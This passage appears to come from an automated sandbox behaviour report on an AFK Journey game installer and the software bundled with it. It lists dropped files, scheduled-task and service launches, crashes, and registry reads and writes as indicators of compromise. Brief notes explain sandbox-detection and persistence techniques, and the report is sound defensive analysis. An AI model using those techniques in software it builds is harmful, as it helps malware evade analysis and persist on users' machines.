Journey\temp\launcher\toolbar_image_temp\DEFAULT\2d1461b0d102581a70d14b3a71e50f1a.png.efdindex AFKJourneyLauncher.exe File created C:\Program Files\McAfee\Temp1962996300\jslang\wa-res-install-sr-Latn-CS.js installer.exe File created C:\Program Files\ReasonLabs\EPP\rsWSC.exe RAVEndPointProtection-installer.exe File created C:\Program Files\McAfee\Temp1962996300\jslang\eula-ru-RU.txt installer.exe File opened for modification C:\Program Files (x86)\AFK Journey\resource\img\icon.ico afkjourneysetup_f78bf3faedfb1ebbc23cdffa53d171fe.exe File created C:\Program Files\ReasonLabs\EPP\rsBridge.dll RAVEndPointProtection-installer.exe File created C:\Program Files\ReasonLabs\EPP\System.Net.WebSockets.Client.dll RAVEndPointProtection-installer.exe File opened for modification C:\Program Files (x86)\AFK Journey\AFKJourney Game\game\AFK Journey_Data\StreamingAssets\aa\StandaloneWindows64\4409491241368522494.bundle AFKJourneyLauncher.exe File created C:\Program Files\ReasonLabs\EPP\System.Threading.Timer.dll RAVEndPointProtection-installer.exe File created C:\Program Files\ReasonLabs\DNS\Microsoft.Win32.TaskScheduler.dll SaferWeb-installer.exe File created C:\Program Files\AVG\Browser\Temp\source3464_1181222194\Safer-bin\124.0.25039.207\Locales\lv.pak setup.exe File created C:\Program Files\Cheat Engine 7.5\languages\is-PL0VR.tmp CheatEngine75.tmp File created C:\Program Files\ReasonLabs\Common\Client\v1.4.2\locales\de.pak RAVEndPointProtection-installer.exe File created C:\Program Files\ReasonLabs\EPP\133608815283178726\EDR\Microsoft.Win32.Primitives.dll RAVEndPointProtection-installer.exe File created C:\Program Files\ReasonLabs\DNS\System.Xml.XDocument.dll SaferWeb-installer.exe File created C:\Program Files\scoped_dir4652_1247191257\classic.png opera.exe File opened for modification C:\Program Files (x86)\AFK Journey\AFKJourney Game\game\AFK Journey_Data\StreamingAssets\aa\StandaloneWindows64\13546192854781235838.bundle AFKJourneyLauncher.exe File opened for modification C:\Program Files (x86)\AFK Journey\AFKJourney Game\game\AFK Journey_Data\StreamingAssets\Sound\Master.strings.bank AFKJourneyLauncher.exe -
Drops file in Windows directory 12 IoCs
Processes:
msiexec.exetaskmgr.exeSecHealthUI.exeSecHealthUI.exedescription ioc Process File created C:\Windows\Installer\SourceHash{EDB7AEE7-E932-4836-AE50-D3B0B7766CB5} msiexec.exe File created C:\Windows\Installer\e6d24a8.msi msiexec.exe File created C:\Windows\rescache\_merged\4183903823\2290032291.pri taskmgr.exe File created C:\Windows\rescache\_merged\4272278488\2581520266.pri SecHealthUI.exe File opened for modification C:\Windows\Installer\e6d24a4.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\rescache\_merged\4272278488\2581520266.pri SecHealthUI.exe File created C:\Windows\Installer\e6d24a4.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI2540.tmp msiexec.exe File created C:\Windows\rescache\_merged\1601268389\715946058.pri taskmgr.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exepid Process 6700 sc.exe 5856 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target Process procid_target 7684 6856 WerFault.exe 395 7552 3908 WerFault.exe 405 5856 5956 WerFault.exe 568 6288 5956 WerFault.exe 568 -
Checks SCSI registry key(s) 3 TTPs 47 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
AVGBrowser.exetaskmgr.exeopera.exeAVGBrowser.exersEDRSvc.exeopera.exeavg_secure_browser_setup.exeAVGBrowser.exeAFK Journey.exeAVGBrowser.exedescription ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AVGBrowser.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags opera.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AVGBrowser.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags rsEDRSvc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Service rsEDRSvc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags opera.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI avg_secure_browser_setup.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AVGBrowser.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AVGBrowser.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_QEMU&PROD_HARDDISK\4&215468A5&0&000000 opera.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_QEMU&PROD_HARDDISK\4&215468A5&0&000000 AFK Journey.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service rsEDRSvc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\LowerFilters rsEDRSvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\Control rsEDRSvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AVGBrowser.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AVGBrowser.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI avg_secure_browser_setup.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AVGBrowser.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName rsEDRSvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AVGBrowser.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AVGBrowser.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\HardwareID AFK Journey.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName rsEDRSvc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc rsEDRSvc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\LowerFilters rsEDRSvc.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AVGBrowser.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AVGBrowser.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_QEMU&PROD_HARDDISK\4&215468A5&0&000000 rsEDRSvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 rsEDRSvc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc rsEDRSvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf rsEDRSvc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags opera.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_QEMU&PROD_HARDDISK\4&215468A5&0&000000\LogConf rsEDRSvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 opera.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 opera.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags opera.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AVGBrowser.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags rsEDRSvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_QEMU&PROD_HARDDISK\4&215468A5&0&000000\Control rsEDRSvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 AFK Journey.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID AFK Journey.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\UpperFilters rsEDRSvc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\UpperFilters rsEDRSvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_QEMU&PROD_HARDDISK\4&215468A5&0&000000 opera.exe -
Checks processor information in registry 2 TTPs 18 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
runonce.exersEDRSvc.exeopera.exeopera.exeAFK Journey.exeCheatEngine75.tmppowershell.exerunonce.exedescription ioc Process Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 runonce.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz rsEDRSvc.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 opera.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz opera.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AFK Journey.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AFK Journey.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ CheatEngine75.tmp Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 rsEDRSvc.exe Key opened \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AFK Journey.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString AFK Journey.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 powershell.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 CheatEngine75.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz runonce.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 runonce.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz runonce.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier powershell.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 opera.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz opera.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid Process 2592 schtasks.exe 96 schtasks.exe 4416 schtasks.exe -
Enumerates system info in registry 2 TTPs 34 IoCs
Processes:
powershell.exeAFK Journey.exeopera.exeAVGBrowser.exechrome.exeAVGBrowser.exeopera.exeopera.exeAVGBrowser.exeAVGBrowser.exeopera.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion powershell.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer AFK Journey.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS opera.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer AVGBrowser.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName AFK Journey.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName opera.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS AVGBrowser.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer AVGBrowser.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSReleaseDate powershell.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName powershell.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName opera.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer opera.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName AVGBrowser.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer AVGBrowser.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName AVGBrowser.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName AVGBrowser.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS opera.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS opera.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS opera.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer opera.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer opera.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS AVGBrowser.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName AVGBrowser.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS AVGBrowser.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName opera.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ AFK Journey.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer opera.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName opera.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS powershell.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS AVGBrowser.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer AVGBrowser.exe -
Processes:
AVGBrowserUpdate.exeexplorer.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{513C6D01-E4A3-4F34-9BD9-3D83C35A3498} AVGBrowserUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{513C6D01-E4A3-4F34-9BD9-3D83C35A3498}\AppPath = "C:\\Program Files (x86)\\AVG\\Browser\\Update\\1.8.1693.6" AVGBrowserUpdate.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{513C6D01-E4A3-4F34-9BD9-3D83C35A3498}\Policy = "3" AVGBrowserUpdate.exe Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{513C6D01-E4A3-4F34-9BD9-3D83C35A3498}\AppName = "AVGBrowserUpdateWebPlugin.exe" AVGBrowserUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{28E08968-59C8-4A77-BEBA-12C9394AE077} AVGBrowserUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{28E08968-59C8-4A77-BEBA-12C9394AE077}\AppName = "AVGBrowserUpdateBroker.exe" AVGBrowserUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{28E08968-59C8-4A77-BEBA-12C9394AE077}\AppPath = "C:\\Program Files (x86)\\AVG\\Browser\\Update\\1.8.1693.6" AVGBrowserUpdate.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{28E08968-59C8-4A77-BEBA-12C9394AE077}\Policy = "3" AVGBrowserUpdate.exe Set value (data) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
rsWSC.exersEngineSvc.exemsiexec.exeAVGBrowserUpdate.exersEDRSvc.exeAVGBrowserUpdate.exersDNSSvc.exeAVGBrowserUpdate.exersSyncSvc.exeAVGBrowserUpdate.exersVPNSvc.exedescription ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs rsWSC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My rsEngineSvc.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\SessionHash = cd43edbe28c72cfb5d6924049c467d6db66e9f302b68ba1f4b02582719baa902 msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache AVGBrowserUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs rsEDRSvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs rsWSC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs rsWSC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs rsWSC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs rsEngineSvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed rsEngineSvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs rsEngineSvc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" rsEngineSvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rsWSC.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\1A\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache AVGBrowserUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates rsEDRSvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates rsWSC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs rsEngineSvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections rsDNSSvc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" AVGBrowserUpdate.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache rsSyncSvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates rsEDRSvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs rsWSC.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" rsEngineSvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\AVG\Browser\Update\ AVGBrowserUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed rsEDRSvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs rsEDRSvc.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1b\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 AVGBrowserUpdate.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1b\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)" rsSyncSvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\AVG AVGBrowserUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA rsWSC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA rsWSC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs rsWSC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs rsEDRSvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates rsEDRSvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust rsEDRSvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs rsWSC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs rsWSC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates rsEngineSvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates rsEngineSvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates rsEngineSvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root rsEDRSvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs rsEngineSvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs rsEngineSvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections rsVPNSvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates rsEDRSvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates rsEDRSvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates rsWSC.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\AVG\Browser\Update\MachineId = "000058d4b27a012b9e3e4541471e6c69" AVGBrowserUpdate.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\AVG\Browser\Update\MachineIdDate = "20240522" AVGBrowserUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs rsEDRSvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs rsEDRSvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust rsEDRSvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs rsEDRSvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs rsWSC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot rsWSC.exe Key created \REGISTRY\USER\.DEFAULT\Software AVGBrowserUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust rsWSC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rsEngineSvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates rsWSC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs rsEngineSvc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" rsEngineSvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft msiexec.exe -
Modifies registry class 64 IoCs
Processes:
